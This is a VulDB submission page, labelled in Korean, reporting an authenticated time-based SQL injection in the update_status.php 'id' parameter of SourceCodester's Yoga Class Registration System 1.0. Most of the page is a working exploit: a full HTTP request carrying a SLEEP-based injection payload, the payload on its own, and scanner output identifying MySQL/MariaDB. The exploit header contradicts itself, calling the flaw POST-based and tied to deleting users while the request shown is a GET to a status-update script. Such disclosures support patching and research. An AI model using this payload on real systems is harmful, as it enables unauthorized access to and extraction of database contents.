| 제목 | Authenticated POST based SQL Injection when Update status on Yoga Class Registration System |
|---|
| 설명 | # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Payload
GET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
##Payload
'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU
the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
|
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html |
|---|
| 사용자 | mroz1l (UID 41497) |
|---|
| 제출 | 2023. 02. 23. AM 11:27 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 02. 23. PM 12:05 (38 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 221675 [SourceCodester Yoga Class Registration System 1.0 Status Update update_status.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|